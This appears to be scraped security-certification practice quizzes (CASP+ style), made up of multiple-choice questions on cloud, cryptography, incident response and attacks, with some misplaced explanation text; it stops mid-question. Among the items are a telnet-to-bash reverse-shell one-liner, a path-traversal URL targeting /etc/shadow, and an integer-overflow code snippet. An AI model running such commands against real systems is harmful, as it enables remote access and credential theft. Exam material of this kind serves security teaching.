F. Implement certificate-based authentication
Points: 0/1
20.
A software assurance analyst reviews an SSH daemon's source code and sees the following:
nresp = packet_get_int();
if (nresp > 0) {
response = xmalloc(nresp*sizeof(char*) ):
for (i = 0; i < nresp; i++)
Response[i] = packet_get_string(NULL);
}
Based on this code snippet, which of the following attacks is most likely to succeed?
A. Race condition
B. Integer overflow
C. Driver shimming
D. Cross-site scripting
Points: 0/1
21. A security analyst has concerns about malware on an endpoint. The malware is unable to detonate by modifying
the kernel response to various system calls. As a test, the analyst modifies a Windows server to respond to system
calls as if it was a Linux server. In another test, the analyst modifies the OS to prevent the malware from identifying
target files. Which of the following techniques is the analyst most likely using?
A. Honeypot
B. Deception
C. Simulators
D. Sandboxing
Points: 0/1
22. A shipping company that is trying to eliminate entire classes of threats is developing an SELinux policy to ensure
its custom Android devices are used exclusively for package tracking. After compiling and implementing the policy,
in which of the following modes must the company ensure the devices are configured to run?
A. Enforcing
B. Protecting
C. Permissive
D. Mandatory

Points: 0/1
23. A company is deploying multiple VPNs to support supplier connections into its extranet applications. The
network security standard requires:
All remote devices to have up-to-date antivirus
A HIDS
An up-to-date and patched OS
Which of the following technologies should the company deploy to meet its security objectives? (Select TWO)

A. NAC
B. Reverse proxy
C. NIDS
D. WAF
E. NGFW
F. Bastion host
Points: 0/1
24. Which of the following communications protocols is used to create PANs with small, low power radios and
supports a large number of nodes?
A. CAN
B. DNP3
C. Modbus
D. WiFi
E. Zigbee
Points: 0/1
25. A digital forensics expert has obtained an ARM binary suspected of including malicious behavior. The expert
would like to trace and analyze the ARM binary's execution. Which of the following tools would best support this
effort?
A. FTK Imager
B. objdump
C. Ghidra
D. OllyDbg
Close
Retake Quiz
Review Answers
Points: 0/1
1. In preparation for the holiday season, a company redesigned the system that manages retail sales and moved it
to a cloud service provider. The new infrastructure didnot meet the company’s availability requirements. During a
postmortem analysis, the following issues were highlighted:
International users reported latency when images on the web page were initially loading
During times of report processing, users reported issues with inventory when attempting to place orders
Despite the fact that ten new API servers were added, the load across servers was heavy at peak times
Which of the following infrastructure design changes would be best for the organization to implement to avoid these
issues in the future?
A. Serve static content via distributed CDNs, create a read replica of the central database and pull reports from
there, and autoscale API servers based on performance
B. Server static content object storage across different regions, increase size on the managed relational
database, and distribute the ten API servers across multiple regions
C. Serve images from an object storage bucket with infrequent read times, replicate the database across
different regions, and dynamically create API servers based on load
D. Increase the bandwidth for the server that delivers images, use a CDN, change the database to non-
relational database, and split the ten API servers across two load balancers

Points: 0/1
2. Due to budget constraints, an organization created a policy that only permits vulnerabilities rated high and critical
according to CVSS to be fixed or mitigated. A security analyst notices that many vulnerabilities that were previously
scored as medium are now breaching higher thresholds. Upon further investigation, the analyst notices certain
ratings are not aligned with the approved system categorization. Which of the following can the analyst do to get a
better picture of the risk while adhering to the organization’s policy?
A. Align the attack vectors to the predetermined system categorization
B. Align the exploitability metrics to the predetermined system categorization
C. Align the remediation levels to the predetermined system categorization
D. Align the impact subscore requirements to the predetermined system categorization
Points: 0/1
3. A DevOps team has deployed databases, event-driven services, and an API gateway as a PaaS solution that will
support a new billing system. Which of the following security responsibilities will the DevOps team need to perform?
A. Securely configure the authentication mechanisms
B. Upgrade the service as part of the life-cycle management
C. Execute port scanning against the services
D. Patch the infrastructure at the OS
Points: 0/1
4. In comparison to other types of alternative processing sites that may be invoked as part of a disaster recovery,
cold sites are different because they:
A. are the quickest way to restore business
B. are geographically separated from the company's primary facility
C. provide workstations and read-only domain controllers
D. have basic utility coverage, including power and water
E. are generally the least costly to sustain
Points: 0/1
5. A company is migrating from company-owned phones to a BYOD strategy for mobile devices. The pilot program
will start with the executive management team and be rolled out to the rest of the staff in phases. The company’s
CFO loses a phone multiple times a year. Which of the following will most likely secure the data on the lost device?
A. Remotely wipe the device
B. Set up different profiles based on the persons risk
C. Require a VPN to be active to access company data
D. Require MFA to access company applications
Points: 0/1
6. A security engineer is evaluating a low-cost method to detect ransomware attacks. The security engineer needs a
way to detect when a ransomware attack is able to access certain files located on a file server. Which of the
following options best fits the security engineer’s needs?
A. Installing open-source HIPS on the file server
B. Installing an open-source sandbox
C. Moving the file server behind an open-source IPS engine
D. Implementing decoy files using open-source tools

Points: 0/1
7. A company wants to harden its network infrastructure and has established the following requirements for its
physical network devices:
Active Directory authentication and authorization should be attempted first, but local authentication and
authorization is permitted if Active Directory fails or is unavailable.
An event-based authentication factor must be used.
Administrative actions must be logged.
Which of the following should the company implement to meet the requirements? (Select TWO)
A. HOTP
B. EAP
C. TOTP
D. SSH
E. TACACS+
F. RADIUS

Points: 0/1
8. In order to save money, a company has moved its data to the cloud with a low cost provider. The company did
not perform a security review prior to the move; however, the company requires all of its data stored within the
country where the headquarters is located. A new employee on the security team has been asked to evaluate the
current provider against the most important requirements. The current cloud provider that the company is using
offers:
Only multi-tenant cloud hosting
Minimal physical security
Few access controls
No access to the data center
The following information has been uncovered:
The company is located in a known floodplain, which flooded last year
Government regulations require data to be stored within the country
Which of the following should be addressed first?
A. Establish a new MOU with the cloud provider
B. Update the DRP to account for natural disasters
C. Establish a new SLA with the cloud provider
D. Provision services according to the appropriate legal requirements
Points: 0/1
9. A network admin who manages a Linux web server notices the following traffic:
http://comptia.org/../../../../etc/shadow
Which of the following is the best action for the network admin to take to defend against this type of web attack?
A. Validate the server input and append the input to the base directory path
B. Validate the server certificate and trust chain
C. Validate that MFA is enabled on the server for all user accounts
D. Validate that the server is not deployed with default account credentials
Points: 0/1
10. A security analyst sees that a hacker has discovered some keys and they are being made available on a public
website. The security analyst is then able to successfully decrypt the data using the keys from the website. Which of
the following should the security analyst recommend to protect the affected data?
A. Key revocation
B. Key rotation
C. Zeroization
D. Key escrow
E. Cryptographic obfuscation
Points: 0/1
11. A security architect is working with a new customer to find a vulnerability assessment solution that meets the
following requirements:
Fast scanning
The least false positives possible
Signature based
A low impact on servers when performing a scan
In addition, the customer has several screened subnets, VLANs, and branch offices. Which of the following will best
meet the customer’s needs?
A. Unauthenticated scanning
B. Passive scanning
C. Authenticated scanning
D. Agent-based scanning
Points: 0/1
12. A multinational organization was hacked, and the incident response team's timely action prevented a major
disaster. Following the event, the team created an after action report. Which of the following is the primary goal of
an after action review?
A. To gather evidence for subsequent legal action
B. To determine the identity of the attacker
C. To identify ways to improve the response process
D. To create a plan of action and milestones

Points: 0/1
13. Which of the following is used to assess compliance with internal and external requirements?
A. RACI matrix
B. Audit report
C. BCP
D. After-action report
E. A RACI matrix is a simple, effective means for defining project roles and responsibilities, providing a
comprehensive chart of who is responsible, accountable, consulted, and informed every step of the way.
Points: 0/1
14. A law firm experienced a breach in which access was gained to a secure server. During an investigation to
determine how the breach occurred, an employee admitted to clicking on a spear-phishing link. A security analyst
reviewed the event logs and found the following:
PAM had not been bypassed
DLP did not trigger any alerts
The antivirus was updated to the most current signature
Which of the following most likely occurred?
A. Exfiltration
B. Privelege escalation
C. Lateral movement
D. Exploitation
Points: 0/1
15. A bank is working with a security architect to find the best solution to detect database management system
compromises. The solution should meet the following requirements:
Work at the application layer
Send alerts on attacks from both privileged and malicious users
Have a very low false positive
Which of the following should the architect recommend?
A. FIM
B. WAF
C. NIPS
D. UTM
E. DAM
F. Database Activity Monitoring
A DAM solution is a security tool that monitors and analyzes database activity for signs of compromise or malicious
activity. It is designed to work at the application layer and can send alerts on attacks from both privileged and
malicious users. A DAM solution can also have a very low false positive rate, making it an effective tool for detecting
database management system compromises.

Points: 0/1
16. A security architect is implementing a web application that uses a database back end. Prior to production, the
architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in
place to prevent these attacks. Which of the following sources could the architect consult to address this security
concern?
A. OWASP
B. OVAL
C. IEEE
D. SDLC
OVAL® International in scope and free for public use, OVAL is an information security community effort to
standardize how to assess and report upon the machine state of computer systems. OVAL includes a language to
encode system details, and an assortment of content repositories held throughout the community.
Tools and services that use OVAL for the three steps of system assessment — representing system information,
expressing specific machine states, and reporting the results of an assessment — provide enterprises with accurate,
consistent, and actionable information so they may improve their security. Use of OVAL also provides for reliable
and reproducible information assurance metrics and enables interoperability and automation among security tools
and services.

IEEE With an active portfolio of nearly 1,300 standards and projects under development, IEEE is a leading
developer of industry standards in a broad range of technologies that drive the functionality, capabilities, and
interoperability of products and services, transforming how people live, work, and communicate.

Points: 0/1
17. A product manager at a new company needs to ensure the development team produces high quality code on
time. The manager has decided to implement an agile development approach instead of waterfall. Which of the
following are reasons to choose an agile development approach? (Chose two)
A. Budgeting and creating a timeline for the entire project is often more straightforward using an agile approach
rather than waterfall
B. The product manager would like to produce code in linear phases
C. The product manager gives the developers more autonomy to write quality code prior to deployment
D. An agile approach incorporates greater application security in the development process than a waterfall
approach does
E. The product manager prefers to have code iteratively tested throughout development
F. The scope of work is expected to evolve during the lifetime of project development
Points: 0/1
18. A security operations center analyst is investigating anomalous activity between a database server and an
unknown external IP address and gather the following data:
dbadmin last logged in at 7:30am and logged out at 8:05am
A persistent TCP/6667 connection to the external address was established at 7:55am. The connection is still alive
Other than bytes transferred to keep the connection alive, only a few kb of data transfer every hour since the start
of the connection
A sample outbound request payload from PCAP showed the ASCII content “JOIN #community”
Which of the following is the most likely root cause?
A. The dbadmin user is consulting the community for help via Internet Relay Chat
B. A botnet Trojan is installed on the database server
C. The system has been hijacked for cryptocurrency mining
D. A SQLi was used to exfiltrate data from the database server
Points: 0/1
19. Users are reporting intermittent access issues with a new cloud application that was recently added to the
network. Upon investigation, the security administrator notices the human resources department is able to run
required queries with the new application, but the marketing department is unable to pull any needed reports on
various resources using the new application. Which of the following most likely needs to be done to avoid this in the
future?
A. Modify the ACLs
B. Update the marketing department's browser
C. Review the Active Directory
D. Reconfigure the WAF
Points: 0/1
20. A security administrator sees several hundred entries in a web server security log that are similar to the
following:
Staten Island, New York, United States was blocked 10 minutes for exceeding the maximum requests per minute at
URL https://companysite.net/xmlrpc.php
6/7/2021 10:05:15 AM, IP: 151.205.188.74 Hostname: pool-151.205.188.74-nycmny.isp.net
Status: 503
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/90.0.44 Safari/537.36
WHOIS: ISP.net (NET-151-196-0-0-1) 151.196.0.0 - 151.205.255.255
The network source varies, but the URL, status, and user agent remain the same. Which of the following would best
protect the web server without blocking legitimate traffic?
A. Automate the addition of bot IP addresses into a deny list for the web host
B. Script the daily collection of the WHOIS ranges to add to the WAF as a denied ACL
C. Replace the file xmlrpc.php with a honeypot to collect further IOCs
D. Block every subnet that is identified as having a bot that is a source of the traffic

Points: 0/1
21. Which of the following is the most important cloud-specific risk from the CSPs viewpont?
A. Insecure data deletion
B. CI/CD deployment failure
C. Resource exhaustion
D. Management plane breach
Points: 0/1
22. A security engineer is creating a single CSR for the following web server hostnames:
www.int.internal
www.company.com
home.internal
www.internal
Which of the following would meet the requirement?
A. CN
B. SAN
C. CA
D. CRL
E. Issuer
Points: 0/1
23. An organization has been leveraging RC4 to protect the confidentiality of a continuous, high-throughput 4k video
stream but must upgrade to a more modern cipher. The new cipher must maximize speed, particularly on endpoints
without crypto instruction sets or coprocessors. Which of the following is most likely to meet the organization’s
requirements?
A. Blowfish
B. AES-GCM
C. AES-CBC
D. ECDSA
E. ChaCha20
Points: 0/1
24. A company's CISO wants to prevent the company from being the target of ransomware. The company's IT
assets need to be protected. Which of the following are the most secure options to address these concerns? (Select
THREE)
A. Strong authentication
B. Application control
C. EDR
D. NGFW
E. IDS
F. Host-bast firewall
G. Antivirus
H. Sandboxing
Points: 0/1
25. An employee's device was missing for 96 hours before being reported. The employee call the help desk to ask
for another device. Which of the following phases of the incident response cylce needs improvement?
A. Resolution
B. Investigation
C. Containment
D. Preparation
Close
Retake Quiz
Review Answers
Points: 0/1
1. A CSP, which wants to compete in the market, has been approaching companies in an attempt to gain business.
The CSP is able to provide the same uptime as other CSPs at a markedly reduced cost. Which of the following
would be the most significant business risk to a company that signs a contract with this CSP?
A. Geographic location
B. Vendor lock-in
C. Control plane breach
D. Resource exhaustion
Points: 0/1
2. A penetration tester is testing a company’s login form for a web application using a list of known usernames and a
common password list. According to a brute-force utility, the pentester needs to provide the tool with the proper
headers, POST URL with variable names, and the error string returned with an improper login. Which of the
following would best help the tester to gather this information? (Select TWO)
A. A tcpdump from the web server
B. The logs from the web server
C. An HTTP interceptor
D. The website certificate viewed via the web browser
E. The inspect feature from the web browser
F. The view source feature of the web browser
Points: 0/1
3. A pentester inputs the following command:
telnet 192.168.99.254 343 | /bin/bash | telnet 192.168.99.254 344
This command will allow the pentester to establish a:
A. reverse shell
B. network pivot
C. port mirror
D. proxy chain
Points: 0/1
4. A company wants to improve its active protection capabilities against unknown and zero-day malware. Which of
the following is the most likely secure solution?
A. App allow list
B. Endpoint log collection
C. Sandbox detonation
D. HIDS
E. NIDS

Points: 0/1
5. A security admin needs to implement an X.509 solution for multiple sites within the HR department. This solution
would need to secure all subdomains associated with the domain name of the main HR web server. Which of the
following would need to be implemented to properly secure the sites and provide easier private key management?
A. Certificate revocation list
B. Wildcard certificate
C. Digital signature
D. Certificate pinning
E. Registration authority
Points: 0/1
6. An organization developed an IRP, Which of the following would be best to assess the effectiveness of the plan?
A. Creating a playbook
B. Performing a tabletop exercise
C. Establishing role succession and call lists
D. Requesting a 3rd party review
E. Generating a checklist by organizational unit

Points: 0/1
7. An organization recently completed a security controls assessment. The results highlighted the following
vulnerabilities:
Out-of-date definitions
Misconfigured OSs
An inability to detect active attacks
Unimpeded access to critical servers’ USB ports
Which of the following will most likely reduce the risks that were identified by the assessment team?
A. Create an information security program that addresses user training perform weekly audits of user
workstations, and utilize a centralized configuration management program
B. Install EDR on endpoints, configure group policy, lock server room doors, and install a camera system with
guards watching 24/7
C. Update antivirus definitions, install a NGFW with logging enabled, use USB port lockers, and run SCAP
scans weekly
D. Implement a vulnerability management program and a SIEM tool with alerting, install a badge system with
zones, and restrict privileged access.
Points: 0/1
8. Which of the following is a security concern for DNP3?
A. Authentication is not allocated
B. Free-form messages require support
C. It is an open source protocol
D. Available function codes are not standardized

Points: 0/1
9. A company processes sensitive cardholder information that is stored in an internal production database and
accessed by internet-facing web servers. The company’s CISO is concerned with the risks related to sensitive data
exposure and wants to implement tokenization of sensitive information at the record level. The company implements
a one-to-many mapping of primary credit card numbers to temporary credit card numbers. Which of the following
should the CISO consider in a tokenization system?
A. Salted hashes
B. Data field watermarking
C. Single-use translation
D. Field tagging

Points: 0/1
10. A user in the finace department uses a laptop to store a spreedsheet that contains confidential financial
information for the company. Which of the following would be the best way to protect the file while the user travels
between locations? (Select TWO)
A. Place an ACL on the file to deny access to everyone
B. Store the file in the user profile
C. Enable access logging on the file
D. Place an ACL on the file to only allow access to specified users
E. Back up the file to an encrypted flash drive
F. Encrypt the laptop with FDE
Points: 0/1
11. A forensic investigator started the process of gathering evidence on a laptop in response to an incident. the
investigator took a snapshot of the hard drive, copied relevant log files, and then performed a memory dump. Which
of the following steps in the process should have occurred first?
A. Copy relevant log files
B. Clone the disk
C. Preserve secure storage
D. Collect the most volatile data
Points: 0/1
12. A company wants to securely manage the APIs that were developed for its in-house apps. Previous penetration
tests revealed that developers were embedding unencrypted passwords in the code. Which of the following can the
company do to address this finding? (Select TWO)
A. Implement user session logging
B. Implement time-based API key management
C. Use SOAP instead of restful services
D. Implement complex, key-length API key management
E. Incorporate a DAST into the DevSecOps process to identify the exposure of secrets
F. Enforce MFA on the developers' workstations and production systems
Points: 0/1
13. A firewall administrator needs to ensure all traffic across the company network is inspected. The administrator
gathers data and finds the following information regarding the typical traffic in the network:
Port Protocol Traffic in (bytes) Traffic out (bytes) % of traffic
80 TCP 1,250,482 2,165,482 3.12
443 TCP 58,395,746 75,947,219 91.4
ICMP 334,562 444,119.9
445 TCP 7,658,433 568,234 4.11
123 UDP 54,645 55,181.08
Which of the following is the best solution to ensure the admin can complete the assigned task?

A. A full tunnel VPN
B. Web content filtering
C. SSL/TLS decryption
D. An endpoint DLP solution
Points: 0/1
14. An organization's senior security architect would like to develope cyberdefensive strategies based on
standardized advarsary techniques, tactics, and procedures commonly observed. Which of the following would best
support this objective?
A. The Diamond Model of Intrusion Analysis
B. Cloud sourced intelligence reporting
C. OSINT analysis
D. Deepfake generation
E. MITRE ATT&CK
Points: 0/1
15. An analyst received a list of IOCs from a government agency. The attack has the following characteristics:
The attack starts with bulk phishing
If a user clicks on the link, a dropper is downloaded to the computer
Each of the malware samples has unique hashes tied to the user
The analyst needs to identify whether existing endpoint controls are effective. Which of the following risk mitigation
techniques should the analyst use?
A. Detonate in a sandbox
B. Blocklist the executable
C. Deploy a honeypot onto the laptops
D. Update the IRP
Points: 0/1
16. A security engineer based in Iceland works in an environment requiring an on-premises and cloud based
storage solution. The solution should take into consideration the following:
The company has sensitive data
The company has proprietary data
The company has its HQs in Iceland, and the data must always reside in that country
Which cloud deployment model should be used?
A. Public cloud
B. Private cloud
C. Community cloud
D. Hybrid cloud
Points: 0/1
17. A company is designing a new system that must have high security. This new system has the following
requirements:
Permissions must be assigned based on role
Fraud from a single person must be prevented
A single entity must not have full access control
Which of the following can the company use to meet these requirements?
A. Need to know
B. Dual responsibility
C. Seperation of duties
D. Least privilege
Points: 0/1
18. A company security engineer arrives at work to face the following scenario:
Website defacement
Calls from the company president indicating the website needs to be fixed immediately because its damaging the
brand
A job offer from the company’s competitor
A security analyst’s investigative report, based on logs from the past 6 months, describing how lateral movement
across the network from various IP addresses originating from a foreign adversary country resulted in exfiltrated
data
Which of the following threat actors is most likely involved?
A. Organized crime
B. Competitotr
C. APT/Nation state
D. Script kiddie
Points: 0/1
19. A company has moved its sensitive workloads to the cloud and needs to ensure high availability and resiliency
of its web based application. The cloud architecture team was given the following requirements:
The app must run at 70% capacity at all times
The app must sustain DoS and DDoS attacks
Services must recover automatically
Which of the following should the cloud architecture team implement? (Select THREE)
A. Continuous snapshots
B. Encryption
C. BCP
D. WAF
E. Containerization
F. Read-only replicas
G. Autoscaling
H. CDN

Points: 0/1
20. When implementing serverless computing, an organization must still account for:
A. hardware compatability
B. the security of its data
C. the underlying computing network infrastructure
D. patching the service

Points: 0/1
21. A software developer is working on a piece of code required by a new software package. The code should use a
protocol to verify the validity of a remote identity. Which of the following should the developer implement in the
code?
A. CRL
B. HSTS
C. RSA
D. OCSP
Points: 0/1
22. An organization has an operational requirement with a specific equipment vendor. The organization is located in
the United States, but the vendor is located in another region. Which of the following risks would be most concerning
to the organization in the event of equipment failure?
A. The organization requires authorized vendor specialists
B. Shipping delays could cost the organization money
C. Support may not be available during all business hours
D. Each region has different regulatory frameworks to follow
Points: 0/1
23. A major broadcasting company that requires continuous availability to streaming content needs to be resilient
against DDoS attakcs, Which of the following is the most important infrastructure security design element to prevent
an outage?
A. Scaling horizontally to handle increases in traffic
B. Supporting heterogenous architecture
C. Ensuring cloud autoscaling is in place
D. Leveraging content delivery network across multiple regions
Points: 0/1
24. A security assessor identified an internet facing web service API provider that was deemed vulnerable.
Execution of testssl provided the following insight:
Start 2021-02-02 18:24:59 -->> 192.168.44.61:443 (192.168.44.61)